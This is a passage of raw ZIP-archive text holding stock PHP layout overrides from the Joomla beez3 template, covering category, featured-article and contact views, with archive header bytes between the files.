	<?php echo $this->loadTemplate('links'); ?>
<?php endif; ?>

<?php if ($this->params->get('maxLevel') != 0 && is_array($this->children[$this->category->id]) && count($this->children[$this->category->id]) > 0) : ?>
	<div class="cat-children">

	<?php if ($this->params->get('show_category_heading_title_text', 1) == 1) : ?>
		<h3>
			<?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?>
		</h3>
	<?php endif; ?>
	<?php echo $this->loadTemplate('children'); ?>
	</div>
<?php endif; ?>

<?php if ($this->pagination->pagesTotal > 1 && ($this->params->def('show_pagination', 1) == 1 || $this->params->get('show_pagination') == 2)) : ?>
	<div class="pagination">
	<?php if ($this->params->def('show_pagination_results', 1)) : ?>
		<p class="counter">
		<?php echo $this->pagination->getPagesCounter(); ?>
		</p>
	<?php endif; ?>
	<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
<?php endif; ?>

</section>
PK!��g���1beez3/html/com_content/category/blog_children.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

$class  = ' class="first"';
$user   = JFactory::getUser();
$groups = $user->getAuthorisedViewLevels();
?>

<?php if (count($this->children[$this->category->id]) > 0) : ?>

	<ul>
	<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
		<?php // Check whether category access level allows access to subcategories. ?>
		<?php if (in_array($child->access, $groups)) : ?>
			<?php
			if ($child->numitems || $this->params->get('show_empty_categories') || count($child->getChildren())) :
				if (!isset($this->children[$this->category->id][$id + 1])) :
					$class = ' class="last"';
				endif;
			?>
				<li<?php echo $class; ?>>
				<?php $class = ''; ?>
					<span class="item-title"><a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($child->id));?>">
						<?php echo $this->escape($child->title); ?></a>
					</span>

					<?php if ($this->params->get('show_subcat_desc') == 1) :?>
						<?php if ($child->description) : ?>
							<div class="category-desc">
								<?php echo JHtml::_('content.prepare', $child->description, '', 'com_content.category'); ?>
							</div>
						<?php endif; ?>
					<?php endif; ?>

					<?php if ( $this->params->get('show_cat_num_articles', 1)) : ?>
						<dl>
							<dt>
								<?php echo JText::_('COM_CONTENT_NUM_ITEMS'); ?>
							</dt>
							<dd>
								<?php echo $child->getNumItems(true); ?>
							</dd>
						</dl>
					<?php endif; ?>

					<?php if (count($child->getChildren()) > 0):
						$this->children[$child->id] = $child->getChildren();
						$this->category = $child;
						$this->maxLevel--;
						if ($this->maxLevel !== 0) :
							echo $this->loadTemplate('children');
						endif;
						$this->category = $child->getParent();
						$this->maxLevel++;
					endif; ?>
				</li>
			<?php endif; ?>
		<?php endif; ?>
	<?php endforeach; ?>
	</ul>

<?php endif; ?>
PK!r3��3beez3/html/com_content/categories/default_items.phpnu&1i�<?php

/**
 * @package     Joomla.Site
 * @subpackage  com_content
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;
$class = ' class="first"';
if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
<ul>
<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
	<?php
	if ($item->numitems || $this->params->get('show_empty_categories_cat') || count($item->getChildren())) :
	if (!isset($this->items[$this->parent->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
	<?php $class = ''; ?>
		<h3 class="item-title"><a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($item->id));?>">
			<?php echo $this->escape($item->title); ?></a>
		</h3>

		<?php if ($this->params->get('show_subcat_desc_cat') == 1) :?>
		<?php if ($item->description) : ?>
			<div class="category-desc">
				<?php echo JHtml::_('content.prepare', $item->description); ?>
			</div>
		<?php endif; ?>
		<?php endif; ?>
		<?php if ($this->params->get('show_cat_num_articles_cat') == 1) :?>
			<dl class="article-count"><dt>
				<?php echo JText::_('COM_CONTENT_NUM_ITEMS'); ?></dt>
				<dd><?php echo $item->numitems; ?></dd>
			</dl>
		<?php endif; ?>

		<?php if (count($item->getChildren()) > 0) :
			$this->items[$item->id] = $item->getChildren();
			$this->parent = $item;
			$this->maxLevelcat--;
			echo $this->loadTemplate('items');
			$this->parent = $item->getParent();
			$this->maxLevelcat++;
		endif; ?>

	</li>
	<?php endif; ?>
<?php endforeach; ?>
</ul>
<?php endif; ?>
PK!�
-beez3/html/com_content/categories/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.beez5
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');

JHtml::_('behavior.caption');
?>
<div class="categories-list<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php if ($this->params->get('show_base_description')) : ?>
	<?php 	//If there is a description in the menu parameters use that; ?>
		<?php if ($this->params->get('categories_description')) : ?>
			<?php echo  JHtml::_('content.prepare', $this->params->get('categories_description'), '', 'com_content.categories'); ?>
		<?php  else: ?>
			<?php //Otherwise get one from the database if it exists. ?>
			<?php  if ($this->parent->description) : ?>
				<div class="category-desc">
					<?php  echo JHtml::_('content.prepare', $this->parent->description, '', 'com_content.categories'); ?>
				</div>
			<?php  endif; ?>
		<?php  endif; ?>
<?php endif; ?>
<?php
echo $this->loadTemplate('items');
?>
</div>

PK!a�;��0beez3/html/com_content/featured/default_item.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create a shortcut for params.
$canEdit = $this->item->params->get('access-edit');
$params  = &$this->item->params;

$showPrintIcon = $params->get('show_print_icon');
$showEmailIcon = $params->get('show_email_icon');

$images         = json_decode($this->item->images);
$app            = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| (strtotime($this->item->publish_down) < strtotime(JFactory::getDate()) && $this->item->publish_down !== JFactory::getDbo()->getNullDate())) : ?>
<div class="system-unpublished">
<?php endif; ?>
<?php if ($params->get('show_title')) : ?>
	<h2>
		<?php if ($params->get('link_titles') && $params->get('access-view')) : ?>
			<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)); ?>">
			<?php echo $this->escape($this->item->title); ?></a>
		<?php else : ?>
			<?php echo $this->escape($this->item->title); ?>
		<?php endif; ?>
	</h2>
<?php endif; ?>

<?php // Content is generated by content plugin event "onContentAfterTitle" ?>
<div class="pull-left"><?php echo $this->item->event->afterDisplayTitle; ?></div>

<?php if ($canEdit || $showPrintIcon || $showEmailIcon) : ?>
	<ul class="actions">
		<?php if ($showPrintIcon) : ?>
		<li class="print-icon">
			<?php echo JHtml::_('icon.print_popup', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
		<?php if ($showEmailIcon) : ?>
		<li class="email-icon">
			<?php echo JHtml::_('icon.email', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>

		<?php if ($canEdit) : ?>
		<li class="edit-icon">
			<?php echo JHtml::_('icon.edit', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
	</ul>
<?php endif; ?>

<?php echo $this->item->event->beforeDisplayContent; ?>

<?php // to do not that elegant would be nice to group the params ?>

<?php if ($params->get('show_author') or $params->get('show_category') or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date') or $params->get('show_parent_category') or $params->get('show_hits')) : ?>
 <dl class="article-info">
 <dt class="article-info-term"><?php  echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?></dt>
<?php endif; ?>
<?php if ($this->item->parent_id != 1 && $params->get('show_parent_category')) : ?>
		<dd class="parent-category-name">
			<?php $title = $this->escape($this->item->parent_title);
				$title = $title ?: JText::_('JGLOBAL_UNCATEGORISED');
				$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->parent_slug)) . '">' . $title . '</a>'; ?>
			<?php if ($params->get('link_parent_category') and $this->item->parent_slug) : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_category')) : ?>
		<dd class="category-name">
			<?php 	$title = $this->escape($this->item->category_title);
					$title = $title ?: JText::_('JGLOBAL_UNCATEGORISED');
					$url = '<a href="'.JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->catslug)).'">'.$title.'</a>';?>
			<?php if ($params->get('link_category') and $this->item->catslug) : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_create_date')) : ?>
		<dd class="create">
		<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $this->item->created, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_modify_date')) : ?>
		<dd class="modified">
		<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $this->item->modified, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_publish_date')) : ?>
		<dd class="published">
		<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', JHtml::_('date', $this->item->publish_up, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if (!empty($this->item->author) && $params->get('show_author')) : ?>
	<dd class="createdby">
		<?php $author = $this->item->created_by_alias ?: $this->item->author; ?>
		<?php if (!empty($this->item->contact_link ) &&  $params->get('link_author') == true) : ?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $this->item->contact_link, $author)); ?>
		<?php else :?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
		<?php endif; ?>
	</dd>
<?php endif; ?>
<?php if ($params->get('show_hits')) : ?>
		<dd class="hits">
		<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $this->item->hits); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_author') or $params->get('show_category') or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date') or $params->get('show_parent_category') or $params->get('show_hits')) : ?>
 </dl>
<?php endif; ?>

<?php  if (isset($images->image_intro) and !empty($images->image_intro)) : ?>
	<?php $imgfloat = empty($images->float_intro) ? $params->get('float_intro') : $images->float_intro; ?>
	<div class="img-intro-<?php echo htmlspecialchars($imgfloat, ENT_COMPAT, 'UTF-8'); ?>">
	<img
		<?php if ($images->image_intro_caption):
			echo 'class="caption"'.' title="' . htmlspecialchars($images->image_intro_caption, ENT_COMPAT, 'UTF-8') .'"';
		endif; ?>
		src="<?php echo htmlspecialchars($images->image_intro, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_intro_alt, ENT_COMPAT, 'UTF-8'); ?>"/>
	</div>
<?php endif; ?>

<?php echo $this->item->introtext; ?>

<?php if ($this->item->readmore && $params->get('show_readmore')) :
	if ($params->get('access-view')) :
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
	else :
		$menu = JFactory::getApplication()->getMenu();
		$active = $menu->getActive();
		$itemId = $active->id;
		$link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
		$link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)));
	endif;
?>
		<p class="readmore">
				<a href="<?php echo $link; ?>">
					<?php if (!$params->get('access-view')) :
						echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
					elseif ($readmore = $this->item->alternative_readmore) :
						echo $readmore;
						if ($params->get('show_readmore_title', 0) != 0) :
							echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
						endif;
					elseif ($params->get('show_readmore_title', 0) == 0) :
						echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
					else :
						echo JText::_('COM_CONTENT_READ_MORE');
						echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
					endif; ?></a>
		</p>
<?php endif; ?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| (strtotime($this->item->publish_down) < strtotime(JFactory::getDate()) && $this->item->publish_down !== JFactory::getDbo()->getNullDate())) : ?>
</div>
<?php endif; ?>

<div class="item-separator"></div>
<?php echo $this->item->event->afterDisplayContent; ?>
PK!<�O[[1beez3/html/com_content/featured/default_links.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>

<h3><?php echo JText::_('COM_CONTENT_MORE_ARTICLES'); ?></h3>

<ol class="links">
<?php foreach ($this->link_items as &$item) : ?>
	<li>
		<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>">
			<?php echo $item->title; ?></a>
	</li>
<?php endforeach; ?>
</ol>

PK! �s�	�	+beez3/html/com_content/featured/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

JHtml::_('behavior.caption');

?>

<section class="blog-featured<?php echo $this->pageclass_sfx;?>">
<?php if ( $this->params->get('show_page_heading') != 0) : ?>
	<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
<?php endif; ?>
<?php $leadingcount = 0; ?>
<?php if (!empty($this->lead_items)) : ?>
<div class="items-leading">
	<?php foreach ($this->lead_items as &$item) : ?>
		<article class="leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?>">
			<?php
				$this->item = &$item;
				echo $this->loadTemplate('item');
			?>
		</article>
		<?php
			$leadingcount++;
		?>
	<?php endforeach; ?>
</div>
<?php endif; ?>
<?php
	$introcount = count($this->intro_items);
	$counter = 0;
?>
<?php if (!empty($this->intro_items)) : ?>
	<?php foreach ($this->intro_items as $key => &$item) : ?>

	<?php
		$key = ($key - $leadingcount) + 1;
		$rowcount = (((int) $key - 1) % (int) $this->columns) + 1;
		$row = $counter / $this->columns;

		if ($rowcount === 1) : ?>

			<div class="items-row cols-<?php echo (int) $this->columns;?> <?php echo 'row-'.$row; ?>">
		<?php endif; ?>
		<article class="item column-<?php echo $rowcount;?><?php echo $item->state == 0 ? ' system-unpublished"' : null; ?>">
			<?php
					$this->item = &$item;
					echo $this->loadTemplate('item');
			?>
		</article>
		<?php $counter++; ?>
			<?php if (($rowcount == $this->columns) or ($counter == $introcount)) : ?>
				<span class="row-separator"></span>
				</div>

			<?php endif; ?>
	<?php endforeach; ?>
<?php endif; ?>

<?php if (!empty($this->link_items)) : ?>
	<div class="items-more">
	<?php echo $this->loadTemplate('links'); ?>
	</div>
<?php endif; ?>

<?php if ($this->params->def('show_pagination', 2) == 1  || ($this->params->get('show_pagination') == 2 && $this->pagination->pagesTotal > 1)) : ?>
	<div class="pagination">

		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			<p class="counter">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		<?php  endif; ?>
				<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
<?php endif; ?>
</section>


PK!�[4��4beez3/html/com_contact/category/default_children.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$class = ' class="first"';
if ($this->maxLevel != 0 && count($this->children[$this->category->id]) > 0) :
?>
<ul>
<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
	<?php
	if ($child->numitems || $this->params->get('show_empty_categories') || count($child->getChildren())) :
	if (!isset($this->children[$this->category->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
		<?php $class = ''; ?>
			<span class="item-title"><a href="<?php echo JRoute::_(ContactHelperRoute::getCategoryRoute($child->id));?>">
				<?php echo $this->escape($child->title); ?></a>
			</span>

			<?php if ($this->params->get('show_subcat_desc') == 1) :?>
			<?php if ($child->description) : ?>
				<div class="category-desc">
					<?php echo JHtml::_('content.prepare', $child->description, '', 'com_contact.category'); ?>
				</div>
			<?php endif; ?>
			<?php endif; ?>

			<?php if ($this->params->get('show_cat_items') == 1) :?>
				<dl><dt>
					<?php echo JText::_('COM_CONTACT_CAT_NUM'); ?></dt>
					<dd><?php echo $child->numitems; ?></dd>
				</dl>
		<?php endif; ?>
			<?php if (count($child->getChildren()) > 0 ) :
				$this->children[$child->id] = $child->getChildren();
				$this->category = $child;
				$this->maxLevel--;
				echo $this->loadTemplate('children');
				$this->category = $child->getParent();
				$this->maxLevel++;
			endif; ?>
		</li>
	<?php endif; ?>
	<?php endforeach; ?>
	</ul>
<?php endif;
PK!�a��((+beez3/html/com_contact/category/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>
<div class="contact-category<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php if ($this->params->get('show_category_title', 1)) : ?>
<h2>
	<?php echo JHtml::_('content.prepare', $this->category->title, '', 'com_contact.category.title'); ?>
</h2>
<?php endif; ?>
<?php if ($this->params->def('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_contact.category.description'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>

<?php echo $this->loadTemplate('items'); ?>

<?php if ($this->maxLevel != 0 && !empty($this->children[$this->category->id])) : ?>
<div class="cat-children">
	<h3><?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?></h3>
	<?php echo $this->loadTemplate('children'); ?>
</div>
<?php endif; ?>
</div>
PK!�-=�441beez3/html/com_contact/category/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.framework');

$listOrder = $this->escape($this->state->get('list.ordering'));
$listDirn  = $this->escape($this->state->get('list.direction'));
?>
<?php if (empty($this->items)) : ?>
	<p> <?php echo JText::_('COM_CONTACT_NO_CONTACTS'); ?> </p>
<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString()); ?>" method="post" name="adminForm" id="adminForm">
<?php if ($this->params->get('show_pagination_limit')) : ?>
	<fieldset class="filters">
	<legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>

		<div class="display-limit">
			<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>&#160;
			<?php echo $this->pagination->getLimitBox(); ?>
		</div>
	</fieldset>
<?php endif; ?>
	<table class="category">
		<?php if ($this->params->get('show_headings')) : ?>
		<thead><tr>

			<?php if ($this->params->get('show_image_heading')) : ?>
			<th class="item-image">
			</th>
			<?php endif; ?>
			<th class="item-title">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_CONTACT_EMAIL_NAME_LABEL', 'a.name', $listDirn, $listOrder); ?>
			</th>
			<?php if ($this->params->get('show_position_headings')) : ?>
			<th class="item-position">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_POSITION', 'a.con_position', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>
			<?php if ($this->params->get('show_email_headings')) : ?>
			<th class="item-email">
				<?php echo JText::_('JGLOBAL_EMAIL'); ?>
			</th>
			<?php endif; ?>
			<?php if ($this->params->get('show_telephone_headings')) : ?>
			<th class="item-phone">
				<?php echo JText::_('COM_CONTACT_TELEPHONE'); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_mobile_headings')) : ?>
			<th class="item-phone">
				<?php echo JText::_('COM_CONTACT_MOBILE'); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_fax_headings')) : ?>
			<th class="item-phone">
				<?php echo JText::_('COM_CONTACT_FAX'); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_suburb_headings')) : ?>
			<th class="item-suburb">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_SUBURB', 'a.suburb', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_state_headings')) : ?>
			<th class="item-state">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_STATE', 'a.state', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>

			<?php if ($this->params->get('show_country_headings')) : ?>
			<th class="item-state">
				<?php echo JHtml::_('grid.sort', 'COM_CONTACT_COUNTRY', 'a.country', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>

			</tr>
		</thead>
		<?php endif; ?>

		<tbody>
			<?php foreach ($this->items as $i => $item) : ?>
				<?php if ($this->items[$i]->published == 0) : ?>
					<tr class="system-unpublished cat-list-row<?php echo $i % 2; ?>">
				<?php else: ?>
					<tr class="cat-list-row<?php echo $i % 2; ?>" >
				<?php endif; ?>

					<?php if ($this->params->get('show_image_heading')) : ?>
						<td class="item-image">
							<?php if ($this->items[$i]->image) : ?>
								<?php echo JHtml::_('image', $this->items[$i]->image, JText::_('COM_CONTACT_IMAGE_DETAILS'), array('class' => 'contact-thumbnail img-thumbnail')); ?>
							<?php endif; ?>
						</td>
					<?php endif; ?>

					<td class="item-title">
						<a href="<?php echo JRoute::_(ContactHelperRoute::getContactRoute($item->slug, $item->catid)); ?>">
							<?php echo $item->name; ?></a>
					</td>

					<?php if ($this->params->get('show_position_headings')) : ?>
						<td class="item-position">
							<?php echo $item->con_position; ?>
						</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_email_headings')) : ?>
						<td class="item-email">
							<?php echo $item->email_to; ?>
						</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_telephone_headings')) : ?>
						<td class="item-phone">
							<?php echo $item->telephone; ?>
						</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_mobile_headings')) : ?>
						<td class="item-phone">
							<?php echo $item->mobile; ?>
						</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_fax_headings')) : ?>
					<td class="item-phone">
						<?php echo $item->fax; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_suburb_headings')) : ?>
					<td class="item-suburb">
						<?php echo $item->suburb; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_state_headings')) : ?>
					<td class="item-state">
						<?php echo $item->state; ?>
					</td>
					<?php endif; ?>

					<?php if ($this->params->get('show_country_headings')) : ?>
					<td class="item-state">
						<?php echo $item->country; ?>
					</td>
					<?php endif; ?>

				</tr>
			<?php endforeach; ?>

		</tbody>
	</table>

	<?php if ($this->params->get('show_pagination')) : ?>
	<div class="pagination">
		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
		<p class="counter">
			<?php echo $this->pagination->getPagesCounter(); ?>
		</p>
		<?php endif; ?>
		<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
	<?php endif; ?>
	<div>
		<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
		<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
	</div>
</form>
<?php endif; ?>
PK!;C��44-beez3/html/com_contact/categories/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');

JHtml::_('behavior.caption');
?>
<div class="categories-list<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
	<?php if ($this->params->get('show_base_description')) : ?>
	<?php 	//If there is a description in the menu parameters use that; ?>
		<?php if ($this->params->get('categories_description')) : ?>
		<div class="category-desc base-desc">
			<?php echo  JHtml::_('content.prepare', $this->params->get('categories_description'), '', 'com_contact.categories'); ?>
			</div>
		<?php  else: ?>
			<?php //Otherwise get one from the database if it exists. ?>
			<?php  if ($this->parent->description) : ?>
				<div class="category-desc base-desc">
					<?php  echo JHtml::_('content.prepare', $this->parent->description, '', 'com_contact.categories'); ?>
				</div>
			<?php  endif; ?>
		<?php  endif; ?>
	<?php endif; ?>
<?php
echo $this->loadTemplate('items');
?>
</div>
PK!y����3beez3/html/com_contact/categories/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$class = ' class="first"';
if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
<ul>
<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
	<?php
	if ($item->numitems || $this->params->get('show_empty_categories_cat') || count($item->getChildren())) :
	if (!isset($this->items[$this->parent->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
	<?php $class = ''; ?>
		<span class="item-title"><a href="<?php echo JRoute::_(ContactHelperRoute::getCategoryRoute($item->id));?>">
			<?php echo $this->escape($item->title); ?></a>
		</span>

		<?php if ($this->params->get('show_subcat_desc_cat') == 1) :?>
		<?php if ($item->description) : ?>
			<div class="category-desc">
				<?php echo JHtml::_('content.prepare', $item->description, '', 'com_contact.categories'); ?>
			</div>
		<?php endif; ?>
		<?php endif; ?>

		<?php if ($this->params->get('show_cat_items_cat') == 1) :?>
			<dl><dt>
				<?php echo JText::_('COM_CONTACT_COUNT'); ?></dt>
				<dd><?php echo $item->numitems; ?></dd>
			</dl>
		<?php endif; ?>

		<?php if (count($item->getChildren()) > 0) :
			$this->items[$item->id] = $item->getChildren();
			$this->parent = $item;
			$this->maxLevelcat--;
			echo $this->loadTemplate('items');
			$this->parent = $item->getParent();
			$this->maxLevelcat++;
		endif; ?>

	</li>
	<?php endif; ?>
<?php endforeach; ?>
</ul>
<?php endif; ?>
PK!�/�add2beez3/html/com_contact/contact/default_profile.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<?php if (JPluginHelper::isEnabled('user', 'profile')) :
	$fields = $this->item->profile->getFieldset('profile'); ?>
<div class="contact-profile" id="users-profile-custom">
	<dl class="dl-horizontal">
	<?php foreach ($fields as $profile) :
		if ($profile->value) :
			echo '<dt>'.$profile->label.'</dt>';
			$profile->text = htmlspecialchars($profile->value, ENT_COMPAT, 'UTF-8');

			switch ($profile->id) :
				case 'profile_website' :
					$v_http = substr($profile->profile_value, 0, 4);

					if ($v_http === 'http') :
						echo '<dd><a href="'.$profile->text.'">'.$profile->text.'</a></dd>';
					else :
						echo '<dd><a href="http://'.$profile->text.'">'.$profile->text.'</a></dd>';
					endif;
					break;

				default:
					echo '<dd>'.$profile->text.'</dd>';
					break;
			endswitch;
		endif;
	endforeach; ?>
	</dl>
</div>
<?php endif; ?>
PK!Z�A""2beez3/html/com_contact/contact/default_address.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/* marker_class: Class based on the selection of text, none, or icons
 * jicon-text, jicon-none, jicon-icon
 */
?>
<dl class="contact-address dl-horizontal">
